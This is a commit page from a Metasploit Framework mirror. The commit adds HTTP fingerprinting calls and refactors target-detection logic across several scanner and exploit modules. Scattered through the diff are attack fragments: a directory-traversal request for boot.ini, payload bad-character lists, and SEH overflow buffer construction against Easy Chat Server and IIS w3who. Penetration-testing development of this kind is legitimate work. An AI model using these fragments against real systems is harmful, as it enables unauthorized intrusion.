infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add http_fingerprint calls to modules that use various headers 

git-svn-id: file:///home/svn/framework3/trunk@9627 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-25 20:53:12 +00:00
parent 2ab5983e2a
commit 12fbdcd878
16 changed files with 167 additions and 133 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/auxiliary/admin/http/tomcat_administration.rb
View File

@ -42,11 +42,14 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = send_request_raw({
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/',
}, 25)
http_fingerprint({ :response => res })
if (res and res.code == 200)
ver = ""
@ -133,4 +136,3 @@ class Metasploit3 < Msf::Auxiliary
end
end
end

7
modules/auxiliary/admin/officescan/tmlisten_traversal.rb
View File

@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -47,11 +45,14 @@ class Metasploit3 < Msf::Auxiliary
def run_host(target_host)
res = send_request_raw({
res = send_request_raw(
{
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'method' => 'GET',
}, 20)
http_fingerprint({ :response => res })
if (res.code >= 200)
if (res.body =~ /boot/)
vuln = "vulnerable."

16
modules/auxiliary/scanner/http/jboss_vulnscan.rb
View File

@ -22,10 +22,14 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'JBoss Vulnerability Scanner',
'Description' => %q{
This module scans a JBoss instance for vulnerablities.
This module scans a JBoss instance for a few vulnerablities.
},
'Version' => '$Revision$',
'Author' => [ 'Tyler Krpata' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => BSD_LICENSE
))
@ -39,14 +43,16 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
print_status("Processing IP #{ip}")
res = send_request_cgi({
res = send_request_cgi(
{
'uri' => "/"+Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (xpb = res.headers['X-Powered-By'])
print_status("X-Powered-By: #{xpb}")
end
info = http_fingerprint({ :response => res })
print_status(info)
if(res.body and />(JBoss[^<]+)/.match(res.body) )
print_status("JBoss error message: #{$1}")
end

8
modules/auxiliary/scanner/http/nginx_source_disclosure.rb
View File

@ -67,12 +67,16 @@ class Metasploit3 < Msf::Auxiliary
get_source = Rex::Text.uri_encode("::$data")
begin
res = send_request_raw({
res = send_request_raw(
{
'method' => 'GET',
'uri' => "/#{uri}#{get_source}",
}, 25)
version = res.headers['Server'] if res
if res
version = res.headers['Server']
http_fingerprint({ :response => res })
end
if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}")

1
modules/auxiliary/scanner/http/tomcat_mgr_login.rb
View File

@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "/manager/html",
'method' => 'GET'
}, 25)
http_fingerprint({ :response => res })
rescue ::Rex::ConnectionError => e
vprint_error("http://#{rhost}:#{rport}/manager/html - #{e}")
return

5
modules/auxiliary/scanner/http/webdav_scanner.rb
View File

@ -43,6 +43,8 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
http_fingerprint({ :response => res })
tserver = res.headers['Server']
if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
@ -54,12 +56,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
report_note(
{
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => wdtype,
:data => 'enabled'
)
})
else
print_status("#{target_host} (#{tserver}) WebDAV disabled.")

11
modules/exploits/multi/http/sun_jsws_dav_options.rb
View File

@ -117,21 +117,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'HTTP',
'version' => '1.0',
'uri' => datastore['PATH']
}, 5)
if res and res['Server']
print_status("Found server: #{res['Server']}")
info = http_fingerprint({ :response => res })
if (info =~ /Sun/)
print_status("Found server: #{info}")
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit

2
modules/exploits/multi/php/php_unserialize_zval_cookie.rb
View File

@ -236,6 +236,8 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
http_fingerprint({ :response => res })
if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}")
return Exploit::CheckCode::Safe

13
modules/exploits/multi/realserver/describe.rb
View File

@ -32,15 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2002-1643' ],
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
},
'Targets' =>
[
@ -56,19 +54,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
info = http_fingerprint({ :response => res })
if res and res['Server']
print_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
def exploit

10
modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
View File

@ -61,7 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
@ -71,7 +72,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 5)
if (res and res.message == "OK" and res.body.match(/TikiWiki v?([0-9\.]*)/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
ver = $1
#print_status("Detected TikiWiki version #{ver}")
ver = ver.split('.')
@ -89,8 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

10
modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
View File

@ -62,7 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
res = send_request_raw(
{
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
@ -72,11 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

3
modules/exploits/windows/http/altn_securitygateway.rb
View File

@ -81,6 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/SecurityGateway.dll'
}, 10)
http_fingerprint({ :response => res })
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
case $1
when /1\.0\.1/
@ -98,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
# handle auto-targeting
mytarget = target
if target.name =~ /Automatic/
mytarget = auto_target
if mytarget.nil?
raise RuntimeError, "Unable to automatically select a target"

5
modules/exploits/windows/http/apache_chunked.rb
View File

@ -161,6 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
def check
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
if response.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
@ -194,6 +196,9 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
targets_to_try = []
if response.nil?

24
modules/exploits/windows/http/efs_easychatserver_username.rb
View File

@ -57,21 +57,28 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))
register_options([
register_options(
[
Opt::RPORT(80),
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
"C:\\Program Files\\Easy Chat Server" ])
], self.class )
end
def check
res = send_request_raw
if res and res['Server'] =~ /Easy Chat Server\/1.0/
return Exploit::CheckCode::Appears
def auto_target
info = http_fingerprint
t = nil
if (info =~ /Easy Chat Server\/1\.0/)
t = targets[0]
end
t
end
return Exploit::CheckCode::Safe
def check
if auto_target
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
@ -79,9 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1)
# exploit buffer.
path = datastore['PATH'] + "\\users\\"
print_status("path: " + path)
# exploit buffer.
filler = rand_text_alpha(256 - path.length)
seh = generate_seh_payload(target.ret)
juju = filler + seh

9
modules/exploits/windows/http/mailenable_auth_header.rb
View File

@ -51,15 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
response = send_request_raw
info = http_fingerprint
if response and
response['Server'] and
response['Server'] =~ /.*MailEnable/
if (info =~ /.*MailEnable/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

58
modules/exploits/windows/isapi/w3who_query.rb
View File

@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
@ -35,11 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1134'],
[ 'OSVDB', '12258'],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
[ 'BID', '11820'],
[ 'CVE', '2004-1134' ],
[ 'OSVDB', '12258' ],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
[ 'BID', '11820' ]
],
'Privileged' => false,
'DefaultOptions' =>
@ -70,38 +67,44 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def check
res = send_request_raw({
def auto_target
res = send_request_raw(
{
'uri' => datastore['URL']
}, -1)
http_fingerprint({ :response => res })
# Was a vulnerable system detected?
t = nil
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
case res.headers['Server']
when /5\.1/
t = targets[2]
else
t = targets[1]
end
end
t
end
return Exploit::CheckCode::Safe
def check
if auto_target
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
if (target.name =~ /Automatic/)
mytarget = auto_target
else
mytarget = target
if(mytarget.name =~ /Automatic/)
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
mytarget = targets[2]
else
mytarget = targets[1]
end
else
print_error("No valid target found")
end
if not mytarget
raise RuntimeError, "No valid target found"
end
buf = rand_text_english(8192, payload_badchars)
@ -120,4 +123,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end